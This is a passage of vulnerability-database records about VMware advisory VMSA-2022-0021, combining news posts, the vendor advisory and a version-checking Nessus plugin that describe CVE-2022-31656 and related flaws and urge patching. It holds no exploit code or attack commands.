databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10--[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 us a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656 VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>) which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA.\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T13:00:00", "type": "malwarebytes", "title": "Update now! VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:00:00", "id": "MALWAREBYTES:9E428F767EFCD8CC64A0BC77175C8151", "href": "https://www.malwarebytes.com/blog/news/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-03T15:33:33", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10\u2014[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 us a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656 VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>) which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA. \n\nStay safe, everyone!\n\nThe post [Update now! VMWare patches critical vulnerabilities in several products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-08-03T13:27:47", "type": "malwarebytes", "title": "Update now! VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:27:47", "id": "MALWAREBYTES:4AD7D9B99AE2ADD1CBB83E0522B03A21", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2022-08-11T18:59:39", "description": "VMware and experts alike are urging users to patch multiple products affected by a critical authentication bypass vulnerability that can allow an attacker to gain administrative access to a system as well as exploit other flaws.\n\nThe bug\u2014tracked as [CVE-2022-31656](<https://tenable.com/cve/CVE-2022-31656>)\u2014earned a rating of 9.8 on the CVSS and is one of a number of fixes the company made in various products [in an update](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) released on Tuesday for flaws that could easily become an exploit chain, researchers said.\n\nCVE-2022-31656 also certainly the most dangerous of these vulnerabilities, and likely will become more so as the researcher who discovered it\u2013[Petrus Viet](<https://twitter.com/VietPetrus>) of VNG Security\u2013has promised [in a tweet](<https://twitter.com/VietPetrus/status/1554485970514608128>) that a proof-of-concept exploit for the bug is \u201csoon to follow,\u201d experts said.\n\nThis adds urgency to the need for organizations affected by the flaw to patch now, researchers said.\n\n\u201cGiven the prevalence of attacks targeting VMware vulnerabilities and a forthcoming proof-of-concept, organizations need to make patching CVE-2022-31656 a priority,\u201d [Claire Tills](<https://www.tenable.com/profile/claire-tills>), senior research engineer with Tenable\u2019s Security Response Team, said in an email to Threatpost. \u201cAs an authentication bypass, exploitation of this flaw opens up the possibility that attackers could create very troubling exploit chains.\u201d\n\n## **Potential for Attack Chain**\n\nSpecifically, CVE-2022-31656 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation.\n\nThe bug affects local domain users and requires that a remote attacker must have network access to a vulnerable user interface, according to [a blog post](<https://www.tenable.com/blog/cve-2022-31656-vmware-patches-several-vulnerabilities-in-multiple-products-vmsa-2022-0021>) by Tills published Tuesday. Once an attacker achieves this, he or she can use the flaw to bypass authentication and gain administrative access, she said.\n\nMoreover, the vulnerability is the gateway to exploiting other remote code execution (RCE) flaws addressed by VMWare\u2019s release this week\u2014[CVE-2022-31658](<https://www.tenable.com/cve/CVE-2022-31658>) and [CVE-2022-31659](<https://www.tenable.com/cve/CVE-2022-31659>)\u2014to form an attack chain, Tills observed.\n\nCVE-2022-31658 is a JDBC injection RCE vulnerability that affect VMware Workspace ONE Access, Identity Manager and vRealize Automation that\u2019s earned an \u201cimportant\u201d score on the CVSS\u20148.0. The flaw allows a malicious actor with administrator and network access to trigger RCE.\n\nCVE-2022-31659 is an SQL injection RCE vulnerability that affects VMware Workspace ONE Access and Identity Manager and also earned a rating of 8.0 with a similar attack vector to CVE-2022-31658. Viet is credited with discovering both of these flaws.\n\nThe other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate.\n\n## **Patch Early, Patch Everything**\n\nVMware is no stranger to having to rush out patches for critical bugs found in its products, and has suffered its share of security woes due to the ubiquity of its platform across enterprise networks.\n\nIn late June, for example, federal agencies warned of [attackers pummeling](<https://threatpost.com/log4shell-targeted-vmware-data/180072/>) VMware Horizon and Unified Access Gateway (UAG) servers to exploit the now-infamous [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) RCE vulnerability, an [easy-to-exploit flaw](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) discovered in the Apache logging library Log4J late last year and [continuously targeted](<https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/>) on VMware and other platforms since then.\n\nIndeed, sometimes even patching has still not been enough for VMware, with attackers targeting existing flaws after the company does its due diligence to release a fix.\n\nThis scenario occurred in December 2020, when [the feds warned](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) the adversaries were actively exploiting a weeks-old bug in Workspace One Access and Identity Manager products three days after the vendor patched the vulnerability.\n\nThough all signs point to the urgency of patching the latest threat to VMware\u2019s platform, it\u2019s highly likely that even if the advice is heeded, the danger will persist for the foreseeable future, observed one security professional.\n\nThough enterprises tend to initially move quickly to patch the most imminent threats to their network, they often miss other places attackers can exploit a flaw, observed Greg Fitzgerald, co-founder of Sevco Security, in an email to Threatpost. This is what leads to persistent and ongoing attacks, he said.\n\n\u201cThe most significant risk for enterprises isn\u2019t the speed at which they are applying critical patches; it comes from not applying the patches on every asset,\u201d Fitzgerald said. \u201cThe simple fact is that most organizations fail to maintain an up-to-date and accurate IT asset inventory, and the most fastidious approach to patch management cannot ensure that all enterprise assets are accounted for.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T15:23:16", "type": "threatpost", "title": "VMWare Urges Users to Patch Critical Authentication Bypass Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T15:23:16", "id": "THREATPOST:556939F8D58337486DFBC3B2A820DE47", "href": "https://threatpost.com/vmware-patch-critical-bug/180346/", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-05-17T16:33:12", "description": "The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected by the following vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. (CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. (CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.", "cvss3": {}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:vmware:identity_manager", "cpe:/a:vmware:workspace_one_access"], "id": "VMWARE_WORKSPACE_ONE_ACCESS_VMSA-2022-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/163939", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163939);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2022-31656\",\n \"CVE-2022-31657\",\n \"CVE-2022-31658\",\n \"CVE-2022-31659\",\n \"CVE-2022-31660\",\n \"CVE-2022-31661\",\n \"CVE-2022-31662\",\n \"CVE-2022-31663\",\n \"CVE-2022-31664\",\n \"CVE-2022-31665\"\n );\n script_xref(name:\"VMSA\", value:\"2022-0021\");\n script_xref(name:\"IAVA\", value:\"2022-A-0303\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0027\");\n\n script_name(english:\"VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An identity store broker application running on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected\nby the following vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access\n to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. (CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger\n a remote code execution. (CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0021.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://core.vmware.com/vmsa-2022-0021-questions-answers-faq\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.vmware.com/s/article/89096\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the HW-160130 hotfix to VMware Workspace One Access / VMware Identity Manager as per the VMSA-2022-0021 advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-31656\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware Workspace ONE Access CVE-2022-31660');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:identity_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workspace_one_access\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workspace_one_access_web_detect.nbin\", \"vmware_workspace_one_access_installed.nbin\");\n script_require_keys(\"installed_sw/VMware Workspace ONE Access\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app = 'VMware Workspace ONE Access';\n\nvar app_info = vcf::vmware_workspace_one_access::get_app_info(combined:TRUE);\n\n# 3.3.[3456] don't have fixed builds, so audit out unless we are doing a paranoid scan\n# Remote detection does not pull hotfixes. Require paranoia\nif ((app_info.webapp || app_info.version =~ \"3\\.3\\.[3456]\\.\") && report_paranoia < 2)\n audit(AUDIT_POTENTIAL_VULN, app, app_info.version);\n\nvar patch = '160130';\n\nvar constraints = [\n { 'min_version':'3.3.4.0.0', 'fixed_version':'3.3.7.0.0', 'fixed_display':'Refer to vendor advisory and apply patch HW-160130.' },\n\n { 'min_version':'19.03.0.1', 'max_version':'19.03.0.1.99999999', 'fixed_display':'19.03.0.1 with HW-160130' },\n \n { 'min_version':'21.08.0.0.0', 'max_version':'21.08.0.0.99999999', 'fixed_display':'21.08.0.0 with HW-160130' },\n { 'min_version':'21.08.0.1', 'max_version':'21.08.0.1.99999999', 'fixed_display':'21.08.0.1 with HW-160130' }\n];\n\nvcf::vmware_workspace_one_access::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, expected_patch:patch);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "vmware": [{"lastseen": "2022-08-12T17:12:24", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "VMSA-2022-0021", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-03T15:24:28", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-09T00:00:00", "id": "VMSA-2022-0021.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.1.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}